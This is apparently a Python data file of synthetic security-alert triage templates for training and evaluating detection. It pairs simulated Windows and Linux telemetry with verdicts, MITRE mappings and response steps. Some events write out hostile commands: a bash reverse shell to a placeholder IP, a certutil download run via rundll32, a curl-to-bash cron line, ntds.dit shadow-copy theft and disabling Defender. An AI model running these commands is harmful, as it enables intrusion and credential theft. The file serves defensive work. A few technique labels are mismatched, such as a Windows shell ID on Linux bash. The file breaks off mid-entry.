# -*- coding: utf-8 -*-
"""
AegisX Template Specifications — Chunk 4 (v0.4)
================================================
Templates TF-086 through TF-117 (32 templates).

Domains:
- Domain 13: Multi-Stage Attack Chains & Sequences (12 templates)
- Domain 14: Incomplete Telemetry & Missing Parent Context (10 templates)
- Domain 15: Enterprise Workflows, Automation & Malicious Lookalikes (10 templates)

Classification distribution for Chunk 4:
- 8 benign, 6 suspicious, 6 likely_malicious, 6 confirmed_malicious, 6 insufficient_evidence (total 32).
Splits for Chunk 4:
- 26 train, 3 val, 3 test.
OS for Chunk 4:
- 18 Windows, 14 Linux.
"""

CHUNK_4 = [
    # --- DOMAIN 13: Multi-Stage Attack Chains & Sequences (12 templates) ---
    ("TF-086", "Phish Macro to PowerShell C2 Staging", "multi_stage_attack", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "finance01",
     "Word Document Spawning Obfuscated PowerShell Network Beacon", "high", "Multi-Stage Macro Execution",
     [("email", "Inbound email from external sender with invoice_q4.docm attachment", '{"sender": "billing@vendor-update.com", "attachment": "invoice_q4.docm", "size": 94820}'),
      ("process_creation", "WINWORD.EXE spawned powershell.exe with hidden window flag", '{"parent": "WINWORD.EXE", "child": "powershell.exe", "flags": "-WindowStyle Hidden"}'),
      ("network_connection", "powershell.exe established TCP connection to {ext_ip}:443", '{"process": "powershell.exe", "dest_ip": "{ext_ip}", "dest_port": 443}')],
     [("Office document executed unauthorized hidden child process powershell.exe.", ["EVT-001", "EVT-002"], "high"),
      ("PowerShell process initiated immediate external encrypted socket to untrusted IP {ext_ip}.", ["EVT-002", "EVT-003"], "high")],
     "Sequential chain of phishing attachment opening, macro shell invocation, and outbound C2 socket confirms multi-stage execution.",
     [("T1566.001", "Spearphishing Attachment", "Initial Access", ["EVT-001"]),
      ("T1059.005", "Visual Basic", "Execution", ["EVT-002"]),
      ("T1059.001", "PowerShell", "Execution", ["EVT-002", "EVT-003"]),
      ("T1071.001", "Web Protocols", "Command and Control", ["EVT-003"])],
     [("Isolate workstation {hostname} from the network.", "immediate", "Sever active C2 channel."),
      ("Quarantine email attachment invoice_q4.docm across mailboxes.", "high", "Prevent secondary infection.")], None),

    ("TF-087", "Spearphishing LNK to Certutil Download to Rundll32 Execution", "multi_stage_attack", "alert_triage", "confirmed_malicious", "train", None, "Windows", "workstation", "hr02",
     "LNK File Invoking Certutil Download and Rundll32 DLL Injection", "critical", "Multi-Stage Ingress & Execution",
     [("file_modification", "Shortcut resume.pdf.lnk extracted from zip archive in Downloads", '{"file": "resume.pdf.lnk", "path": "C:\\\\Users\\\\hr02\\\\Downloads"}'),
      ("process_creation", "cmd.exe invoked certutil.exe -urlcache -split -f http://{domain}/lib.dll C:\\Temp\\lib.dll", '{"cmd": "certutil.exe -urlcache -split -f http://{domain}/lib.dll C:\\\\Temp\\\\lib.dll"}'),
      ("process_creation", "rundll32.exe loaded dropped payload C:\\Temp\\lib.dll,DllRegisterServer", '{"cmd": "rundll32.exe C:\\\\Temp\\\\lib.dll,DllRegisterServer"}'),
      ("network_connection", "rundll32.exe initiated persistent HTTPS beaconing to {ext_ip}:8443", '{"dest_ip": "{ext_ip}", "dest_port": 8443}')],
     [("Double-extension LNK shortcut triggered Living-off-the-Land download via certutil.", ["EVT-001", "EVT-002"], "critical"),
      ("Downloaded unsigned DLL registered into rundll32 and initiated external C2 communication.", ["EVT-003", "EVT-004"], "critical")],
     "Unambiguous three-stage cyber kill chain: user execution of spearphishing LNK, proxy tool download, and DLL proxy execution.",
     [("T1204.002", "Malicious File", "Execution", ["EVT-001"]),
      ("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-002"]),
      ("T1036.005", "Match Legitimate Name or Location", "Defense Evasion", ["EVT-003"]),
      ("T1071.001", "Web Protocols", "Command and Control", ["EVT-004"])],
     [("Isolate host {hostname} and kill running rundll32 process.", "immediate", "Terminate active malware agent."),
      ("Delete staged library C:\\Temp\\lib.dll and compute SHA-256 hash for IOC blocklist.", "high", "Eradicate payload.")], None),

    ("TF-088", "Authorized Software Deployment via SCCM and PowerShell", "multi_stage_attack", "alert_triage", "benign", "train", "benign_vs_suspicious", "Windows", "workstation", "employee01",
     "SCCM Automated Application Deployment and Service Registration", "low", "Authorized Software Deployment",
     [("process_creation", "CcmExec.exe spawned powershell.exe executing deploy_vpn_client.ps1", '{"parent": "CcmExec.exe", "script": "deploy_vpn_client.ps1"}'),
      ("file_modification", "Signed binary GlobalProtect.exe written to C:\\Program Files\\Palo Alto Networks\\", '{"path": "C:\\\\Program Files\\\\Palo Alto Networks\\\\GlobalProtect.exe", "signed": true}'),
      ("service_creation", "New system service PanGPS registered by SYSTEM account", '{"service_name": "PanGPS", "image_path": "C:\\\\Program Files\\\\Palo Alto Networks\\\\PanGPS.exe"}')],
     [("Enterprise Configuration Manager pushed corporate VPN client update via signed PowerShell script.", ["EVT-001", "EVT-002"], "low"),
      ("Expected background service PanGPS registered under system authority.", ["EVT-003"], "low")],
     "Legitimate multi-stage IT deployment workflow originating from verified SCCM management agent.",
     [("T1059.001", "PowerShell", "Execution", ["EVT-001"]),
      ("T1543.003", "Windows Service", "Persistence", ["EVT-003"])],
     [("Close alert as authorized corporate endpoint software distribution.", "low", "Operational maintenance.")], None),

    ("TF-089", "Multi-Host RDP Pivot to NTDS Stealing", "multi_stage_attack", "alert_triage", "confirmed_malicious", "train", None, "Windows", "server", "admin01",
     "Lateral RDP Movement to Domain Controller Followed by Database Shadow Copy", "critical", "Lateral Movement to Credential Theft",
     [("authentication", "User admin01 logged onto member server 10.0.1.42 via RDP from workstation 10.0.1.77", '{"user": "admin01", "source_ip": "10.0.1.77", "dest_ip": "10.0.1.42", "logon_type": 10}'),
      ("authentication", "User admin01 initiated secondary RDP jump from 10.0.1.42 to Domain Controller 10.0.1.15", '{"user": "admin01", "source_ip": "10.0.1.42", "dest_ip": "10.0.1.15", "logon_type": 10}'),
      ("process_creation", "cmd.exe executed vssadmin.exe create shadow /for=C: on Domain Controller", '{"cmd": "vssadmin.exe create shadow /for=C:"}'),
      ("file_modification", "ntds.dit copied from shadow volume to C:\\PerfLogs\\ntds.dit", '{"file": "ntds.dit", "path": "C:\\\\PerfLogs\\\\ntds.dit"}')],
     [("Anomalous multi-hop RDP traversal through intermediate member server to Domain Controller.", ["EVT-001", "EVT-002"], "critical"),
      ("Volume shadow copy used on Domain Controller to extract Active Directory database file.", ["EVT-003", "EVT-004"], "critical")],
     "Coordinated lateral movement pivot culminating in Active Directory database extraction.",
     [("T1021.001", "Remote Desktop Protocol", "Lateral Movement", ["EVT-001", "EVT-002"]),
      ("T1003.003", "NTDS", "Credential Access", ["EVT-003", "EVT-004"])],
     [("Sever all network connections to Domain Controller 10.0.1.15 and pivot host 10.0.1.42.", "immediate", "Contain database theft."),
      ("Reset all enterprise administrative credentials and initiate AD forest recovery.", "immediate", "Invalidate compromised forest keys.")], None),

    ("TF-090", "Compromised Web Service to Linux Bash Reverse Shell", "multi_stage_attack", "alert_triage", "confirmed_malicious", "val", None, "Linux", "server", "www-data",
     "Web Server RCE Exploitation Spawning Outbound Bash Socket", "critical", "Web Application Remote Code Execution",
     [("process_creation", "nginx spawned php-fpm which executed /bin/sh -c 'bash -i >& /dev/tcp/{ext_ip}/4444 0>&1'", '{"parent": "php-fpm", "cmd": "bash -i >& /dev/tcp/{ext_ip}/4444 0>&1"}'),
      ("network_connection", "Outbound TCP socket established to {ext_ip}:4444 from unprivileged web account", '{"dest_ip": "{ext_ip}", "dest_port": 4444, "user": "www-data"}'),
      ("process_creation", "Interactive bash shell executed id, uname -a, and cat /etc/shadow", '{"cmd": "cat /etc/shadow", "status": "permission_denied"}')],
     [("Web server child process spawned interactive reverse shell targeting external listener {ext_ip}.", ["EVT-001", "EVT-002"], "critical"),
      ("Post-exploitation reconnaissance and credential file read attempted under www-data.", ["EVT-003"], "high")],
     "Confirmed web application compromise resulting in interactive reverse command shell to external infrastructure.",
     [("T1059.003", "Windows Command Shell", "Execution", ["EVT-001"]),
      ("T1071.001", "Web Protocols", "Command and Control", ["EVT-002"]),
      ("T1082", "System Information Discovery", "Discovery", ["EVT-003"])],
     [("Terminate process tree associated with outbound socket PID on {hostname}.", "immediate", "Kill reverse shell."),
      ("Place web server in maintenance mode and inspect application logs for vulnerable endpoint.", "high", "Patch RCE vulnerability.")], None),

    ("TF-091", "Benign IT Linux System Backup to SFTP", "multi_stage_attack", "alert_triage", "benign", "train", None, "Linux", "server", "backup_svc",
     "Automated Database Dump and Encrypted Offsite SFTP Sync", "informational", "Scheduled Offsite Backup",
     [("scheduled_task", "Cron job 'nightly_db_sync' executed by backup_svc", '{"cron_name": "nightly_db_sync", "user": "backup_svc"}'),
      ("process_creation", "pg_dumpall | gzip -c > /var/backups/db_nightly.sql.gz executed successfully", '{"cmd": "pg_dumpall | gzip -c > /var/backups/db_nightly.sql.gz"}'),
      ("network_connection", "sftp client connected to corporate disaster recovery vault 10.0.3.5:22", '{"dest_ip": "10.0.3.5", "dest_port": 22, "protocol": "SSH"}')],
     [("Automated database maintenance cron job executed routine compressed export.", ["EVT-001", "EVT-002"], "informational"),
      ("Encrypted backup transferred over internal SFTP channel to designated DR storage.", ["EVT-003"], "informational")],
     "Standard scheduled operational maintenance transferring encrypted database backup to internal vault.", [],
     [("Close alert as verified scheduled backup task.", "low", "Routine maintenance telemetry.")], None),

    ("TF-092", "Spearphishing Email with Macro Dropping Executable", "multi_stage_attack", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "legal01",
     "Legal Document Macro Extracting Staged Binary to AppData", "high", "Macro Ingress Payload",
     [("email", "External email received with attachment Contract_Agreed.xlsm from external sender", '{"sender": "contracts@external-corp.org", "file": "Contract_Agreed.xlsm"}'),
      ("file_modification", "EXCEL.EXE dropped unsigned binary updater.exe to C:\\Users\\legal01\\AppData\\Local\\Temp\\", '{"path": "C:\\\\Users\\\\legal01\\\\AppData\\\\Local\\\\Temp\\\\updater.exe"}'),
      ("process_creation", "updater.exe spawned and attempted connection to external IP {ext_ip}:8080", '{"process": "updater.exe", "dest_ip": "{ext_ip}", "dest_port": 8080}')],
     [("Excel macro wrote executable file to user temporary folder.", ["EVT-001", "EVT-002"], "high"),
      ("Dropped executable immediately attempted outbound connection to external IP.", ["EVT-003"], "high")],
     "Multi-stage macro delivery mechanism extracting and running untrusted executable payload.",
     [("T1566.001", "Spearphishing Attachment", "Initial Access", ["EVT-001"]),
      ("T1059.005", "Visual Basic", "Execution", ["EVT-002"]),
      ("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-003"])],
     [("Kill updater.exe process and isolate workstation {hostname}.", "immediate", "Halt payload activity."),
      ("Submit updater.exe to sandbox for behavioral analysis.", "medium", "Identify threat family.")], None),

    ("TF-093", "Windows Service Creation with PowerShell Download Cradle", "multi_stage_attack", "alert_triage", "likely_malicious", "test", None, "Windows", "server", "sysadmin02",
     "Service Creation Configured to Launch Obfuscated PowerShell", "high", "Malicious Service Execution",
     [("service_creation", "Service 'WinNetUpdate' created with binpath invoking powershell.exe -enc {enc}", '{"service_name": "WinNetUpdate", "binpath": "powershell.exe -enc {enc}"}'),
      ("powershell_log", "ScriptBlock execution logged download cradle pulling payload from {domain}", '{"url": "http://{domain}/core.ps1"}')],
     [("New service registered pointing directly to encoded PowerShell command line.", ["EVT-001"], "high"),
      ("ScriptBlock logging reveals external cradle fetching remote script from untrusted domain.", ["EVT-002"], "high")],
     "Service persistence combined with remote staging download represents classic malware loader behavior.",
     [("T1543.003", "Windows Service", "Persistence", ["EVT-001"]),
      ("T1059.001", "PowerShell", "Execution", ["EVT-001", "EVT-002"]),
      ("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-002"])],
     [("Stop and delete service 'WinNetUpdate' immediately.", "immediate", "Remove persistence."),
      ("Inspect user account sysadmin02 for signs of credential compromise.", "high", "Assess account state.")], None),

    ("TF-094", "Admin Using PowerShell with Incomplete Audit Trail", "multi_stage_attack", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Windows", "workstation", "it_admin01",
     "PowerShell Script Execution with Truncated ScriptBlock Audit", "medium", "Incomplete Script Logging",
     [("process_creation", "powershell.exe executed script maintenance_batch.ps1 from network share \\\\SRV-FILE-01\\admin$", '{"script": "\\\\\\\\SRV-FILE-01\\\\admin$\\\\maintenance_batch.ps1"}'),
      ("powershell_log", "EID 4104 captured truncated script block due to log buffer overflow", '{"buffer_overflow": true, "captured_bytes": 128}')],
     [("Administrative user launched script from network administrative share.", ["EVT-001"], "medium"),
      ("PowerShell script block audit was truncated before capturing script operations.", ["EVT-002"], "low")],
     "Execution from administrative share is standard for IT, but truncated logging prevents verification of script contents.", [],
     [("Retrieve copy of maintenance_batch.ps1 directly from file share for inspection.", "high", "Verify script safety.")],
     ["Full script file \\\\SRV-FILE-01\\\\admin$\\\\maintenance_batch.ps1", "Endpoint EDR telemetry around execution window"]),

    ("TF-095", "Linux Cron Job Invoking Curl to Sh Pipe", "multi_stage_attack", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Linux", "server", "root",
     "Crontab Entry Executing Curl Directly into Shell Pipe", "high", "Cron Remote Execution",
     [("file_modification", "New crontab entry added to /var/spool/cron/crontabs/root", '{"line": "0 * * * * curl -s http://{domain}/update.sh | bash"}'),
      ("network_connection", "curl connected to external IP {ext_ip}:80 on scheduled hour", '{"dest_ip": "{ext_ip}", "dest_port": 80}')],
     [("Crontab configured to fetch external shell script and pipe directly into bash.", ["EVT-001", "EVT-002"], "high")],
     "Piping remote web content directly into root shell via cron is a major security risk and typical backdoor pattern.",
     [("T1053.005", "Scheduled Task", "Persistence", ["EVT-001"]),
      ("T1059.003", "Windows Command Shell", "Execution", ["EVT-001"]),
      ("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-002"])],
     [("Remove unauthorized cron line from root crontab immediately.", "immediate", "Remove persistence mechanism."),
      ("Analyze network egress and firewall logs for destination {ext_ip}.", "high", "Assess external contact.")], None),

    ("TF-096", "Automated Security Vulnerability Scanner Network Sweep", "multi_stage_attack", "alert_triage", "benign", "train", None, "Linux", "server", "secops",
     "Nessus Scanner Conducting Scheduled Subnet Vulnerability Scan", "informational", "Authorized Vulnerability Scan",
     [("process_creation", "nessusd spawned scan task scanning local subnet 10.0.1.0/24", '{"process": "nessusd", "task": "WeeklyVulnAudit"}'),
      ("network_connection", "High volume of sequential TCP connection probes to ports 22, 80, 443, 445", '{"ports": [22, 80, 443, 445], "packet_count": 14200}'),
      ("vulnerability_scan", "Scanner host 10.0.2.25 registered as authorized security audit engine", '{"authorized_scanner": true, "engine": "Nessus"}')],
     [("Registered security operations vulnerability scanner performed scheduled network discovery.", ["EVT-001", "EVT-002", "EVT-003"], "informational")],
     "Documented security scan originated from authorized scanner IP with valid schedule registration.", [],
     [("Close alert as authorized routine vulnerability scanning.", "low", "Operational security audit.")], None),

    ("TF-097", "Suspicious WMI Process Launch with Missing Arguments", "multi_stage_attack", "alert_triage", "suspicious", "test", "suspicious_vs_insufficient_evidence", "Windows", "server", "svc_sql",
     "SQL Service Account Invoking WMI Command with Truncated Log", "medium", "WMI Execution Anomaly",
     [("wmi_activity", "WMI method Win32_Process.Create invoked under service account svc_sql", '{"caller": "svc_sql", "method": "Win32_Process.Create"}'),
      ("process_creation", "cmd.exe spawned as child of WmiPrvSE.exe without recorded command line parameters", '{"parent": "WmiPrvSE.exe", "child": "cmd.exe", "cmdline": null}')],
     [("Service account invoked WMI process creation spawning command shell.", ["EVT-001", "EVT-002"], "medium")],
     "Service accounts executing command shells via WMI is abnormal; missing command line arguments warrant verification.",
     [("T1059.003", "Windows Command Shell", "Execution", ["EVT-002"])],
     [("Review SQL Server error logs and agent job history at execution timestamp.", "medium", "Identify triggering SQL job.")], None),

    # --- DOMAIN 14: Incomplete Telemetry & Missing Context (10 templates) ---
    ("TF-098", "PowerShell Execution with Missing Command Line Log", "incomplete_telemetry", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Windows", "workstation", "employee05",
     "PowerShell Invocation with Null Command Line Telemetry", "medium", "Missing Process Arguments",
     [("process_creation", "powershell.exe spawned with process arguments recorded as null or empty", '{"process": "powershell.exe", "arguments": null}'),
      ("authentication", "Interactive logon session active for employee05 on finance workstation", '{"user": "employee05", "session": "active"}')],
     [("PowerShell executable invoked, but process command line logging failed to capture switches.", ["EVT-001", "EVT-002"], "medium")],
     "PowerShell execution without command line details cannot be evaluated for malicious intent or legitimate activity.", [],
     [("Query endpoint EDR console or inspect PowerShell operational event log for Event ID 4104.", "high", "Recover script commands.")],
     ["Microsoft-Windows-PowerShell/Operational log", "EDR sensor raw telemetry cache"]),

    ("TF-099", "Network Connection from Ephemeral Process with Missing Hash", "incomplete_telemetry", "alert_triage", "suspicious", "train", "suspicious_vs_likely_malicious", "Windows", "server", "admin02",
     "Outbound Socket from Terminated Binary Without Hash", "medium", "Missing Process Binary Hash",
     [("network_connection", "Process PID 4920 established outbound connection to {ext_ip}:443 and immediately exited", '{"pid": 4920, "dest_ip": "{ext_ip}", "dest_port": 443}'),
      ("file_modification", "Binary C:\\Temp\\runner.exe deleted before file hash calculation completed", '{"path": "C:\\\\Temp\\\\runner.exe", "hash": null}')],
     [("Ephemeral executable contacted external IP address and deleted itself before hash capture.", ["EVT-001", "EVT-002"], "medium")],
     "Self-deleting binary contacting external IP is suspicious behavior commonly seen in droppers.",
     [("T1071.001", "Web Protocols", "Command and Control", ["EVT-001"])],
     [("Check memory capture if available or query perimeter firewall for transferred payload size.", "high", "Investigate transferred bytes.")], None),

    ("TF-100", "Linux Sudo Execution with Truncated Auth Log", "incomplete_telemetry", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Linux", "server", "developer01",
     "Sudo Command Invoked with Truncated Command Record", "low", "Truncated Sudo Telemetry",
     [("authentication", "PAM session opened for root by developer01 via sudo", '{"user": "developer01", "target": "root"}'),
      ("process_creation", "sudo command line truncated at 16 characters in /var/log/auth.log", '{"command": "sudo systemctl..."}')],
     [("Developer user executed privileged command through sudo, but exact arguments truncated.", ["EVT-001", "EVT-002"], "low")],
     "Developer accounts frequently manage system services, but privileged execution warrants monitoring.",
     [("T1078", "Valid Accounts", "Defense Evasion", ["EVT-001"])],
     [("Review journalctl logs or developer shell history on {hostname}.", "medium", "Retrieve full command.")], None),

    ("TF-101", "Firewall Inbound Drop Burst from Unregistered IP", "incomplete_telemetry", "alert_triage", "benign", "train", None, "Linux", "server", "root",
     "Firewall Dropped Packet Spike with Missing Reverse DNS", "informational", "Perimeter Blocked Traffic",
     [("firewall_log", "UFW dropped 180 inbound connection attempts on port 22 within 30 seconds", '{"port": 22, "source_ip": "185.220.101.33", "action": "DROP"}'),
      ("dns_query", "Reverse DNS lookup for 185.220.101.33 returned NXDOMAIN", '{"ip": "185.220.101.33", "ptr": "NXDOMAIN"}')],
     [("External host scanned SSH port and was successfully blocked by perimeter firewall rules.", ["EVT-001", "EVT-002"], "informational")],
     "Standard perimeter port probing successfully neutralized by firewall; no endpoint access occurred.", [],
     [("Close alert as benign blocked external perimeter probe.", "low", "Routine perimeter block.")], None),

    ("TF-102", "Scheduled Task Trigger with Corrupted XML Definition", "incomplete_telemetry", "alert_triage", "suspicious", "train", "suspicious_vs_insufficient_evidence", "Windows", "workstation", "system",
     "Task Scheduler Event with Unparseable Task Action XML", "medium", "Corrupted Task Definition",
     [("scheduled_task", "Task Scheduler Event ID 106 logged task registration with corrupted action node", '{"task_name": "AppUpdateTask", "xml_corrupted": true}'),
      ("process_creation", "cmd.exe executed in background without associated task arguments", '{"process": "cmd.exe", "arguments": null}')],
     [("Scheduled task registered, but task definition XML is unreadable in event stream.", ["EVT-001", "EVT-002"], "medium")],
     "Inability to parse task action prevents verification; warrants inspection of physical task file.",
     [("T1053.005", "Scheduled Task", "Persistence", ["EVT-001"])],
     [("Inspect task definition XML directly in C:\\Windows\\System32\\Tasks\\AppUpdateTask.", "high", "Recover task XML.")], None),

    ("TF-103", "DNS Query Spike with Truncated Response Packet", "incomplete_telemetry", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Windows", "server", "employee01",
     "High Volume DNS Queries with Incomplete Resolution Log", "medium", "Incomplete DNS Telemetry",
     [("dns_query", "35 rapid DNS queries to subdomains of {domain} recorded by client resolver", '{"domain": "{domain}", "query_count": 35}'),
      ("network_connection", "DNS response packet capture truncated before recording response resource records", '{"truncated": true, "captured_bytes": 64}')],
     [("Client performed rapid DNS queries, but response record contents not captured.", ["EVT-001", "EVT-002"], "medium")],
     "Could indicate DNS tunneling or high-frequency lookup; truncated response prevents confirming payload transfer.", [],
     [("Enable full DNS query/response debug logging on internal DNS server for {hostname}.", "high", "Capture complete DNS packets.")],
     ["DNS server debug analytical log", "Full PCAP capture for client DNS traffic"]),

    ("TF-104", "Service Startup Crash with Missing Error Dump", "incomplete_telemetry", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Windows", "server", "sysadmin01",
     "Service Terminated Immediately After Creation Without Crash Log", "medium", "Aborted Service Startup",
     [("service_creation", "Service 'DbSyncHelper' created by sysadmin01", '{"service": "DbSyncHelper", "path": "C:\\\\App\\\\bin\\\\dbsync.exe"}'),
      ("process_creation", "dbsync.exe exited with code 0xC0000005 (Access Violation) within 200ms", '{"exit_code": "0xC0000005"}')],
     [("New service crashed immediately upon launch due to access violation exception.", ["EVT-001", "EVT-002"], "medium")],
     "Service crashing immediately on startup can indicate an aborted exploit or memory corruption.",
     [("T1543.003", "Windows Service", "Persistence", ["EVT-001"])],
     [("Inspect Windows Application event log or configure WER to generate crash dump.", "medium", "Diagnose crash cause.")], None),

    ("TF-105", "Linux Cron Job Missing Parent Script on Disk", "incomplete_telemetry", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Linux", "server", "root",
     "Crontab References Non-Existent Shell Script", "low", "Missing Cron Target File",
     [("scheduled_task", "CRON daemon attempted to execute /usr/local/bin/cleanup_orphans.sh", '{"cmd": "/usr/local/bin/cleanup_orphans.sh"}'),
      ("file_modification", "OS reported error: /usr/local/bin/cleanup_orphans.sh No such file or directory", '{"error": "ENOENT"}')],
     [("Cron attempted to execute shell script that does not exist on the filesystem.", ["EVT-001", "EVT-002"], "low")],
     "May be an old abandoned admin cron job or evidence of an attacker deleting their staged tool.", [],
     [("Review auditd file deletion logs for /usr/local/bin/ to see when script was removed and by whom.", "medium", "Track script deletion.")],
     ["Auditd syscall logs for unlink/rename", "Package manager verification for missing binaries"]),

    ("TF-106", "Authentication Event with Corrupted Logon Type", "incomplete_telemetry", "investigation_planning", "insufficient_evidence", "val", "suspicious_vs_insufficient_evidence", "Windows", "workstation", "contractor01",
     "Security Log 4624 Recorded with Unknown Logon Type Code", "low", "Corrupted Authentication Log",
     [("authentication", "Security Event ID 4624 recorded for contractor01 with LogonType recorded as 0 or undefined", '{"event_id": 4624, "user": "contractor01", "logon_type": 0}'),
      ("network_connection", "Internal workstation contacted local domain controller over port 88", '{"dest_port": 88}')],
     [("Successful logon logged, but logon type field contains invalid zero code.", ["EVT-001", "EVT-002"], "low")],
     "Corrupted event log entry leaves open whether logon was interactive, network, or service-based.", [],
     [("Query Domain Controller Kerberos authentication log (Event 4768/4769) for contractor01.", "medium", "Correlate Kerberos tickets.")],
     ["Domain Controller Event Log 4768", "Workstation security event log surrounding timestamp"]),

    ("TF-107", "Web Shell Probe with Empty Response Body", "incomplete_telemetry", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Linux", "server", "www-data",
     "HTTP POST to Non-Existent Web Shell Endpoint", "low", "Incomplete Web Exploit Probe",
     [("network_connection", "External IP {ext_ip} sent HTTP POST to /shell.php returning HTTP 404 Not Found", '{"url": "/shell.php", "method": "POST", "status": 404}'),
      ("file_modification", "Web root /var/www/html/ has no file named shell.php", '{"exists": false}')],
     [("External scanner probed for known web shell name on web server, received 404 error.", ["EVT-001", "EVT-002"], "low")],
     "Hostile scan attempt probing for web shells; blocked by web server returning 404.",
     [("T1071.001", "Web Protocols", "Command and Control", ["EVT-001"])],
     [("Inspect web server access logs for any 200 OK responses to other dynamic endpoints.", "medium", "Check for successful requests.")], None),

    # --- DOMAIN 15: Enterprise Workflows, Automation & Malicious Lookalikes (10 templates) ---
    ("TF-108", "IT Routine Patch Deployment with PowerShell", "admin_workflows", "alert_triage", "benign", "train", "benign_vs_suspicious", "Windows", "server", "it_admin01",
     "Automated Windows Update Script Running Under Service Account", "informational", "Scheduled Patch Automation",
     [("process_creation", "powershell.exe executed Install-WindowsUpdate.ps1 from C:\\AdminScripts\\", '{"script": "C:\\\\AdminScripts\\\\Install-WindowsUpdate.ps1", "signed": true}'),
      ("network_connection", "powershell.exe contacted windowsupdate.microsoft.com over HTTPS", '{"dest_host": "windowsupdate.microsoft.com", "dest_port": 443}'),
      ("file_modification", "Windows update log updated in C:\\Windows\\WindowsUpdate.log", '{"file": "WindowsUpdate.log"}')],
     [("Authorized IT administrator executed signed Windows update maintenance script.", ["EVT-001", "EVT-002", "EVT-003"], "informational")],
     "Standard documented IT server maintenance connecting to verified Microsoft update infrastructure.",
     [("T1059.001", "PowerShell", "Execution", ["EVT-001"])],
     [("Close alert as verified routine administrative update script.", "low", "Documented operational maintenance.")], None),

    ("TF-109", "HR Software Installation via MSI Executable", "admin_workflows", "alert_triage", "benign", "train", None, "Windows", "workstation", "hr01",
     "Workday Desktop Agent Installation via Msiexec", "informational", "MSI Package Installation",
     [("process_creation", "msiexec.exe /i WorkdaySetup.msi /qn executed from C:\\Downloads\\", '{"cmd": "msiexec.exe /i WorkdaySetup.msi /qn"}'),
      ("file_modification", "Workday files written to C:\\Program Files\\Workday\\", '{"path": "C:\\\\Program Files\\\\Workday\\\\workday.exe"}'),
      ("registry_modification", "Uninstall registry entry created in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", '{"key": "HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\Workday"}')],
     [("Standard Windows Installer service installed corporate Workday desktop application.", ["EVT-001", "EVT-002", "EVT-003"], "informational")],
     "Approved corporate HR software deployed via standard Windows installer package.", [],
     [("Close alert as approved corporate desktop software deployment.", "low", "Verified enterprise software.")], None),

    ("TF-110", "Linux Devops Ansible Configuration Run", "admin_workflows", "evidence_analysis", "benign", "val", None, "Linux", "server", "ansible",
     "Ansible Automation Agent Applying Baseline System Configurations", "informational", "Ansible Configuration Management",
     [("authentication", "Ansible service account logged in via SSH key from automation server 10.0.1.15", '{"user": "ansible", "source_ip": "10.0.1.15", "method": "publickey"}'),
      ("process_creation", "ansible executed python3 to apply configuration playbook", '{"cmd": "python3 /tmp/ansible_module.py"}'),
      ("file_modification", "/etc/ntp.conf updated to enforce corporate NTP servers", '{"file": "/etc/ntp.conf"}')],
     [("Authorized automation service account applied infrastructure configuration changes.", ["EVT-001", "EVT-002", "EVT-003"], "informational")],
     "Routine enterprise configuration management run via dedicated Ansible service account.",
     [("T1059.006", "Python", "Execution", ["EVT-002"])],
     [("Close alert as verified Ansible configuration playbook execution.", "low", "Standard infrastructure automation.")], None),

    ("TF-111", "Finance User Exporting Encrypted CSV to OneDrive", "admin_workflows", "alert_triage", "benign", "train", "benign_vs_suspicious", "Windows", "workstation", "finance02",
     "Encrypted Payroll Report Synced to Corporate OneDrive", "low", "Corporate Cloud File Sync",
     [("process_creation", "EXCEL.EXE exported encrypted archive payroll_oct.zip", '{"file": "payroll_oct.zip"}'),
      ("network_connection", "OneDrive.exe synchronized payroll_oct.zip to corporate SharePoint tenant", '{"dest_host": "company-my.sharepoint.com", "bytes": 452000}')],
     [("Authorized finance officer generated and synchronized routine payroll export to corporate cloud storage.", ["EVT-001", "EVT-002"], "low")],
     "Expected business workflow transferring encrypted payroll data to approved corporate cloud destination.", [],
     [("Close alert as approved corporate financial file synchronization.", "low", "Legitimate business workflow.")], None),

    ("TF-112", "Disguised Developer Compiling Ransomware Stub in Visual Studio", "admin_workflows", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "developer02",
     "Compiler Spawning Binary with High-Entropy Cryptographic Loops", "high", "Malicious Binary Compilation",
     [("process_creation", "devenv.exe spawned cl.exe compiling source files with XOR and AES encryption routines", '{"parent": "devenv.exe", "source": "crypter.cpp"}'),
      ("file_modification", "Binary locker.exe compiled and dropped into C:\\Users\\developer02\\AppData\\Local\\Temp", '{"output": "locker.exe", "path": "C:\\\\Users\\\\developer02\\\\AppData\\\\Local\\\\Temp\\\\locker.exe"}'),
      ("threat_intel_match", "Code signature matches known LockBit builder template strings", '{"signature": "LockBit-Builder-Ref"}')],
     [("Developer workstation compiled custom binary containing known ransomware encryption logic.", ["EVT-001", "EVT-002"], "high"),
      ("Threat intelligence matches compiled binary patterns against known ransomware family.", ["EVT-003"], "high")],
     "Compiling ransomware builder payloads on enterprise endpoints indicates insider threat or compromised developer environment.",
     [("T1486", "Data Encrypted for Impact", "Impact", ["EVT-001", "EVT-002"])],
     [("Isolate developer workstation {hostname} and preserve project source code.", "immediate", "Prevent payload deployment."),
      ("Audit user account developer02 for compromised access tokens.", "high", "Investigate origin.")], None),

    ("TF-113", "Compromised IT Admin Disabling Defender and Tampering Logs", "admin_workflows", "alert_triage", "confirmed_malicious", "train", None, "Windows", "server", "it_admin02",
     "Domain Admin Disabling Windows Defender Real-Time Protection", "critical", "Security Feature Tampering",
     [("process_creation", "powershell.exe executed Set-MpPreference -DisableRealtimeMonitoring $true", '{"cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"}'),
